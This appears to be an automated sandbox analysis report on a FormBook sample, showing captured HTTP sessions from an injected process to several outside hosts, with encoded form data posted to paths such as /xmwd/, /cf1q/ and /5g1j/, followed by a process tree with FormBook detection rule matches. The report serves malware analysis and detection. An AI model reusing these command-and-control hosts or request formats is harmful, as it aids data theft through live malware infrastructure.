                                                                  31 | 192.168.2.4 | 50033 | 85.159.66.93 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:53:06.404608011 CET | 10830 | OUT | POST /xmwd/ HTTP/1.1
                                                                  Host: www.esnafus.online
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.esnafus.online
                                                                  Referer: http://www.esnafus.online/xmwd/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  32 | 192.168.2.4 | 50034 | 85.159.66.93 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:53:08.944063902 CET | 460 | OUT | GET /xmwd/?Ol=yN0LtN-HDTPXX&3h=IE+rnmKnemgDtsiA8D5STAXs+nTDk69pr8eDsUHYy7apDPgh9p40v/i3nAWVLY2hDfLFviaUsm8qLT6zg1+OTK9FmT+L4AChwwgp3/M3yzjoJwJ2lNnYZDs= HTTP/1.1
                                                                  Host: www.esnafus.online
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:53:09.657424927 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx/1.14.1
                                                                  Date: Fri, 10 Jan 2025 17:53:09 GMT
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  X-Rate-Limit-Limit: 5s
                                                                  X-Rate-Limit-Remaining: 19
                                                                  X-Rate-Limit-Reset: 2025-01-10T17:53:14.5483463Z


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  33 | 192.168.2.4 | 50035 | 156.253.8.115 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 10, 2025 18:53:14.735112906 CET | 722 | OUT | POST /cf1q/ HTTP/1.1
                                                                  Host: www.sssvip2.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.sssvip2.shop
                                                                  Referer: http://www.sssvip2.shop/cf1q/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 4e 73 54 35 79 64 30 62 50 41 45 74 55 59 53 58 6d 35 75 68 31 51 61 69 4d 75 59 6d 66 78 64 39 73 59 39 6c 4d 4f 63 55 68 6b 6b 76 76 7a 65 41 35 6f 4f 6d 68 72 57 72 68 43 73 34 4c 44 66 69 43 67 71 5a 6c 53 5a 6d 6a 44 39 66 77 7a 2b 63 69 59 6d 55 72 59 7a 5a 6d 58 45 52 43 6a 39 67 43 41 61 77 52 67 75 52 6e 4e 70 50 69 61 41 61 2b 2f 68 6e 77 6c 37 74 4a 49 75 75 75 73 67 4e 6e 4f 71 6b 39 6c 33 74 6e 6f 6d 52 51 72 66 62 41 52 7a 63 30 73 68 63 35 61 42 63 6f 58 70 75 45 73 67 4c 66 62 67 4e 4b 56 62 48 74 46 6a 55 4e 39 53 73 74 49 45 64 6a 73 6e 68 4c 6b 5a 46 58 77 3d 3d
                                                                  Data Ascii: 3h=NsT5yd0bPAEtUYSXm5uh1QaiMuYmfxd9sY9lMOcUhkkvvzeA5oOmhrWrhCs4LDfiCgqZlSZmjD9fwz+ciYmUrYzZmXERCj9gCAawRguRnNpPiaAa+/hnwl7tJIuuusgNnOqk9l3tnomRQrfbARzc0shc5aBcoXpuEsgLfbgNKVbHtFjUN9SstIEdjsnhLkZFXw==
Timestamp: Jan 10, 2025 18:53:15.725756884 CET | Bytes transferred: 339 | Direction: IN
HTTP/1.1 302 Found
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:53:15 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-control: no-cache,must-revalidate
                                                                  Location: /home/login
                                                                  Set-Cookie: PHPSESSID=d46a039ef821422e6fe04eec797044e7; path=/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID: 34
Source IP: 192.168.2.4
Source Port: 50036
Destination IP: 156.253.8.115
Destination Port: 80
PID: 1780
Process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
Timestamp: Jan 10, 2025 18:53:17.276911974 CET | Bytes transferred: 742 | Direction: OUT
POST /cf1q/ HTTP/1.1
                                                                  Host: www.sssvip2.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.sssvip2.shop
                                                                  Referer: http://www.sssvip2.shop/cf1q/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 4e 73 54 35 79 64 30 62 50 41 45 74 56 34 69 58 6b 65 36 68 67 41 61 6c 49 65 59 6d 4b 42 64 78 73 59 68 6c 4d 50 70 50 69 57 51 76 75 52 57 41 2b 71 32 6d 79 62 57 72 35 53 73 39 45 6a 66 70 43 67 57 2f 6c 58 5a 6d 6a 41 42 66 77 33 36 63 69 72 65 62 72 49 7a 66 34 33 45 66 63 54 39 67 43 41 61 77 52 67 37 32 6e 4e 78 50 69 72 77 61 2b 64 4a 6b 2b 46 37 73 59 49 75 75 34 63 67 42 6e 4f 71 4b 39 6b 72 48 6e 75 69 52 51 75 37 62 44 46 6e 66 2b 73 68 53 33 36 42 58 6a 6d 77 72 4b 35 4e 59 55 36 67 55 4f 33 54 37 6c 6a 75 4f 63 4d 7a 37 2f 49 67 75 2b 72 75 56 47 6e 6b 4d 4d 30 44 68 77 55 58 6d 79 69 50 5a 52 77 62 76 53 33 31 57 34 6f 63 3d
                                                                  Data Ascii: 3h=NsT5yd0bPAEtV4iXke6hgAalIeYmKBdxsYhlMPpPiWQvuRWA+q2mybWr5Ss9EjfpCgW/lXZmjABfw36cirebrIzf43EfcT9gCAawRg72nNxPirwa+dJk+F7sYIuu4cgBnOqK9krHnuiRQu7bDFnf+shS36BXjmwrK5NYU6gUO3T7ljuOcMz7/Igu+ruVGnkMM0DhwUXmyiPZRwbvS31W4oc=
Timestamp: Jan 10, 2025 18:53:18.300914049 CET | Bytes transferred: 339 | Direction: IN
HTTP/1.1 302 Found
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:53:18 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-control: no-cache,must-revalidate
                                                                  Location: /home/login
                                                                  Set-Cookie: PHPSESSID=41ecd998e6400453eb4c1b432d1e78c9; path=/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID: 35
Source IP: 192.168.2.4
Source Port: 50037
Destination IP: 156.253.8.115
Destination Port: 80
PID: 1780
Process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
Timestamp: Jan 10, 2025 18:53:19.826001883 CET | Bytes transferred: 10824 | Direction: OUT
POST /cf1q/ HTTP/1.1
                                                                  Host: www.sssvip2.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.sssvip2.shop
                                                                  Referer: http://www.sssvip2.shop/cf1q/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 4e 73 54 35 79 64 30 62 50 41 45 74 56 34 69 58 6b 65 36 68 67 41 61 6c 49 65 59 6d 4b 42 64 78 73 59 68 6c 4d 50 70 50 69 57 49 76 75 6b 61 41 2b 4e 69 6d 78 62 57 72 78 79 73 38 45 6a 66 6f 43 6b 36 37 6c 58 6b 45 6a 47 46 66 2f 30 69 63 7a 75 79 62 34 6f 7a 66 69 58 45 53 43 6a 39 51 43 41 71 30 52 67 72 32 6e 4e 78 50 69 6f 59 61 71 66 68 6b 75 31 37 74 4a 49 75 79 75 73 67 6c 6e 4f 43 38 39 6b 66 39 6e 2b 43 52 54 49 62 62 47 7a 62 66 32 73 68 51 77 36 41 58 6a 6d 4d 67 4b 39 74 55 55 36 55 75 4f 31 50 37 67 47 48 4e 65 34 33 7a 6f 71 6f 57 70 6f 61 70 4f 46 34 4f 4c 47 44 64 34 58 7a 63 69 69 37 79 4a 7a 2b 35 42 57 6f 56 6d 34 2b 31 69 38 5a 31 72 73 39 53 46 37 74 4b 76 6e 30 66 65 58 64 45 41 67 49 75 30 36 65 58 37 76 62 4d 6a 4d 43 69 33 63 6d 6e 64 6a 70 70 71 72 64 47 73 31 66 65 6a 71 36 49 32 71 69 6d 6c 33 33 32 76 66 2f 69 68 75 4d 47 4a 46 47 48 49 64 50 78 41 2f 44 37 6d 6f 38 42 72 48 41 38 54 64 51 77 66 4d 37 48 37 39 6c 52 77 31 47 49 50 6c 6d 62 41 70 6a 38 56 71 76 [TRUNCATED]
Data Ascii: 3h=[TRUNCATED]
Timestamp: Jan 10, 2025 18:53:21.086890936 CET | Bytes transferred: 339 | Direction: IN
HTTP/1.1 302 Found
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:53:20 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-control: no-cache,must-revalidate
                                                                  Location: /home/login
                                                                  Set-Cookie: PHPSESSID=525376cef77ec8f39174c627b6f5d9b5; path=/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID: 36
Source IP: 192.168.2.4
Source Port: 50038
Destination IP: 156.253.8.115
Destination Port: 80
PID: 1780
Process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
Timestamp: Jan 10, 2025 18:53:22.369898081 CET | Bytes transferred: 458 | Direction: OUT
GET /cf1q/?3h=Au7Zxr9sERBgSOyq6sWX0Xm+S784fSZRk7JANtZrtFINqgeh5LGBoKKy7i8WIDLxVDqalClkjREz1X29sb2m/qDZ/T0gendGAmanUDy32Npyhfc7xsZS61c=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.sssvip2.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Timestamp: Jan 10, 2025 18:53:23.350660086 CET | Bytes transferred: 339 | Direction: IN
HTTP/1.1 302 Found
                                                                  Server: nginx
                                                                  Date: Fri, 10 Jan 2025 17:53:23 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-control: no-cache,must-revalidate
                                                                  Location: /home/login
                                                                  Set-Cookie: PHPSESSID=e92edce6417e7cc5f038da05329ff74a; path=/
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


Session ID: 37
Source IP: 192.168.2.4
Source Port: 50039
Destination IP: 13.248.169.48
Destination Port: 80
PID: 1780
Process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
Timestamp: Jan 10, 2025 18:53:28.435842037 CET | Bytes transferred: 725 | Direction: OUT
POST /5g1j/ HTTP/1.1
                                                                  Host: www.shipley.group
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.shipley.group
                                                                  Referer: http://www.shipley.group/5g1j/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 79 52 61 31 30 4c 35 45 7a 42 31 34 31 44 4d 45 73 53 53 57 4d 31 42 51 77 30 66 54 65 30 67 48 35 47 58 73 53 49 4f 4c 69 6e 62 4f 2f 49 68 76 2b 33 4c 48 55 55 5a 52 39 39 2b 46 43 44 37 7a 4e 58 39 4f 70 48 4e 5a 4d 31 67 2b 48 39 2b 34 6d 53 5a 6f 6d 5a 38 43 6d 61 34 79 2b 76 31 48 6a 51 65 4b 69 79 54 6f 6e 77 55 4c 45 6e 42 57 50 68 63 50 72 73 70 72 6f 32 34 39 31 39 4c 6b 38 57 63 47 75 6c 49 76 65 57 45 56 48 4f 54 42 54 75 55 5a 4c 55 48 6a 4a 6f 76 39 66 78 50 32 65 30 57 61 38 72 44 48 72 6e 61 77 56 4a 4d 5a 73 4e 70 38 70 43 66 65 38 57 62 4c 72 7a 55 59 67 3d 3d
                                                                  Data Ascii: 3h=FyRa10L5EzB141DMEsSSWM1BQw0fTe0gH5GXsSIOLinbO/Ihv+3LHUUZR99+FCD7zNX9OpHNZM1g+H9+4mSZomZ8Cma4y+v1HjQeKiyTonwULEnBWPhcPrspro24919Lk8WcGulIveWEVHOTBTuUZLUHjJov9fxP2e0Wa8rDHrnawVJMZsNp8pCfe8WbLrzUYg==
Timestamp: Jan 10, 2025 18:53:29.024465084 CET | Bytes transferred: 73 | Direction: IN
HTTP/1.1 405 Method Not Allowed
                                                                  content-length: 0
                                                                  connection: close


Session ID: 38
Source IP: 192.168.2.4
Source Port: 50040
Destination IP: 13.248.169.48
Destination Port: 80
PID: 1780
Process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
Timestamp: Jan 10, 2025 18:53:30.980751991 CET | Bytes transferred: 745 | Direction: OUT
POST /5g1j/ HTTP/1.1
                                                                  Host: www.shipley.group
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.shipley.group
                                                                  Referer: http://www.shipley.group/5g1j/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 79 52 61 31 30 4c 35 45 7a 42 31 36 57 62 4d 48 50 36 53 55 73 31 47 56 77 30 66 47 75 30 6b 48 35 4b 58 73 54 39 52 4b 51 54 62 58 65 34 68 75 36 44 4c 58 45 55 5a 5a 64 39 2f 59 79 44 4b 7a 4e 4c 66 4f 71 66 4e 5a 4d 78 67 2b 46 6c 2b 37 51 61 65 79 57 5a 79 58 57 61 36 32 2b 76 31 48 6a 51 65 4b 69 58 47 6f 6e 34 55 49 30 33 42 45 36 4e 66 4d 72 73 71 73 6f 32 34 35 31 39 50 6b 38 57 45 47 76 49 6a 76 62 53 45 56 46 6d 54 42 69 75 62 58 4c 56 4d 6e 4a 70 61 34 2f 6f 58 30 72 46 62 59 61 33 68 4a 62 58 68 31 54 45 57 49 64 73 2b 75 70 6d 73 44 37 66 76 47 6f 4f 64 44 6c 58 63 34 75 73 59 6e 6e 66 4d 79 79 71 42 69 68 6b 65 36 55 73 3d
                                                                  Data Ascii: 3h=FyRa10L5EzB16WbMHP6SUs1GVw0fGu0kH5KXsT9RKQTbXe4hu6DLXEUZZd9/YyDKzNLfOqfNZMxg+Fl+7QaeyWZyXWa62+v1HjQeKiXGon4UI03BE6NfMrsqso24519Pk8WEGvIjvbSEVFmTBiubXLVMnJpa4/oX0rFbYa3hJbXh1TEWIds+upmsD7fvGoOdDlXc4usYnnfMyyqBihke6Us=


Session ID: 39
Source IP: 192.168.2.4
Source Port: 50041
Destination IP: 13.248.169.48
Destination Port: 80
PID: 1780
Process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
Timestamp: Jan 10, 2025 18:53:33.527383089 CET | Bytes transferred: 10827 | Direction: OUT
POST /5g1j/ HTTP/1.1
                                                                  Host: www.shipley.group
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.shipley.group
                                                                  Referer: http://www.shipley.group/5g1j/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 46 79 52 61 31 30 4c 35 45 7a 42 31 36 57 62 4d 48 50 36 53 55 73 31 47 56 77 30 66 47 75 30 6b 48 35 4b 58 73 54 39 52 4b 51 4c 62 4c 39 77 68 76 62 44 4c 46 55 55 5a 58 39 39 69 59 79 44 58 7a 4e 44 62 4f 74 57 36 5a 50 5a 67 2b 6d 74 2b 7a 43 79 65 38 6d 5a 79 49 47 61 35 79 2b 76 46 48 6a 41 61 4b 69 48 47 6f 6e 34 55 49 79 54 42 54 2f 68 66 4b 72 73 70 72 6f 32 30 39 31 39 33 6b 38 65 55 47 76 39 59 76 50 6d 45 57 6c 57 54 53 41 57 62 49 62 56 4f 67 4a 70 43 34 2f 55 32 30 71 74 39 59 61 72 62 4a 59 4c 68 31 6c 49 56 4e 75 49 79 30 71 76 79 66 36 6e 4c 65 49 61 54 46 6d 6e 64 35 4d 68 45 37 30 66 54 35 69 36 4d 6e 6a 42 59 6f 78 55 6b 6b 76 44 4e 66 48 2f 39 63 73 6b 33 68 35 57 4b 2b 30 59 59 68 59 75 74 33 53 41 52 34 39 65 4e 33 44 2f 6b 55 74 58 36 72 42 48 55 68 6c 70 45 78 47 4e 38 30 38 4a 75 77 52 6e 2b 57 37 46 75 46 6b 49 57 48 58 52 37 63 2f 50 4b 70 4f 43 65 46 6e 56 78 38 45 61 36 2f 4f 56 61 36 47 62 6a 38 33 4f 54 42 4b 35 5a 4d 6e 58 5a 6d 71 4e 37 4f 53 50 6a 33 63 6e [TRUNCATED]
                                                                  Data Ascii: 3h=FyRa10L5EzB16WbMHP6SUs1GVw0fGu0kH5KXsT9RKQLbL9whvbDLFUUZX99iYyDXzNDbOtW6ZPZg+mt+zCye8mZyIGa5y+vFHjAaKiHGon4UIyTBT/hfKrspro209193k8eUGv9YvPmEWlWTSAWbIbVOgJpC4/U20qt9YarbJYLh1lIVNuIy0qvyf6nLeIaTFmnd5MhE70fT5i6MnjBYoxUkkvDNfH/9csk3h5WK+0YYhYut3SAR49eN3D/kUtX6rBHUhlpExGN808JuwRn+W7FuFkIWHXR7c/PKpOCeFnVx8Ea6/OVa6Gbj83OTBK5ZMnXZmqN7OSPj3cnQH9CJ6mTuFlM7pyUPtpKzdeGCAexmzS3BEQn9m9w6YvWN0WbVQrekxTeZ05EIue5VpXX0l555gY3szSHjOtzu+jIJrD2ZY1DuugLA4/5ytF/+woumqGU4SqMEwhEuGfbqRdh8QkSKjkmr2zDfbzXRgJITDncnR+lJzGqZCefVwd8sP8xyDFqrScEXq6+7E09VI4WwdlcbOzrjP+CSn2BO6/qbs1dTvwHUfyOyYz3VoJ0OQ7/DsurIl93w/NlhmKicguy4jtkIWKod/9GCJFpWLWF04npJFQW+qz7FMU8ya75lXODMGSqh6PtaC0AOqccfHjbO6wVMfOji9hMxIbT+vwUylbOsZlC9EVphuK+vijeYmQeIBDsx5JqtqlUxe0PwECtyUmSIery4vJE/+z7cDROsYzhGLdSO3S2EWQiuFrSjms9kfNRM5XxcX7SjIOLmQZun7Vtk68SXuf8CgUsaDK7JJzpIqt8S2BZ148K5V8TDWBD+GmUSYbFznaTcldrVFjGFGNpsmGzKvhVzfP3lzKKUF5zAuKczzpraC9E0xRZpavRikRPV7JeYQfGKiTtsMizYeYC4oKZTd+gayz/WuXAlTXVVIZXxa4BnYRIwecFeSlN3ArWoCDFI1uge4rkWoJsc2YFPxVMCVZQLUke4N2Rnh5ukFEoIb [TRUNCATED]
Timestamp: Jan 10, 2025 18:53:34.086782932 CET | Bytes transferred: 73 | Direction: IN
HTTP/1.1 405 Method Not Allowed
                                                                  content-length: 0
                                                                  connection: close


Session ID: 40
Source IP: 192.168.2.4
Source Port: 50042
Destination IP: 13.248.169.48
Destination Port: 80
PID: 1780
Process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
Timestamp: Jan 10, 2025 18:53:36.068082094 CET | Bytes transferred: 459 | Direction: OUT
GET /5g1j/?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.shipley.group
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Timestamp: Jan 10, 2025 18:53:39.659254074 CET | Bytes transferred: 376 | Direction: IN
HTTP/1.1 200 OK
                                                                  content-type: text/html
                                                                  date: Fri, 10 Jan 2025 17:53:39 GMT
                                                                  content-length: 255
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 68 3d 49 77 35 36 32 42 37 54 50 41 49 33 32 67 54 57 62 73 61 37 53 5a 42 39 42 31 67 34 54 38 41 75 41 61 61 4e 74 67 35 33 45 44 4c 50 51 39 6b 6e 6e 34 57 31 64 58 67 78 53 49 52 31 47 69 44 51 35 65 62 61 4d 63 2b 35 64 66 64 2b 7a 32 70 61 35 79 69 77 70 33 35 52 58 45 54 71 6b 74 6e 54 44 30 59 71 66 44 4f 42 74 48 63 76 43 55 54 50 64 70 4a 39 4f 36 51 3d 26 4f 6c 3d 79 4e 30 4c 74 4e 2d 48 44 54 50 58 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX"}</script></head></html>


                                                                  Target ID:0
                                                                  Start time:12:50:30
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\3HnH4uJtE7.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\3HnH4uJtE7.exe"
                                                                  Imagebase:0x8e0000
                                                                  File size:1'401'344 bytes
                                                                  MD5 hash:B88BAB75A48B9FEFCD3395AFA9891D69
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:12:50:33
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\3HnH4uJtE7.exe"
                                                                  Imagebase:0xee0000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:12:50:48
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe"
                                                                  Imagebase:0x6d0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:6
                                                                  Start time:12:50:49
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\SysWOW64\wiaacmgr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\wiaacmgr.exe"
                                                                  Imagebase:0xc60000
                                                                  File size:84'480 bytes
                                                                  MD5 hash:2F1D379CE47E920BDDD2C50214457E0F
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
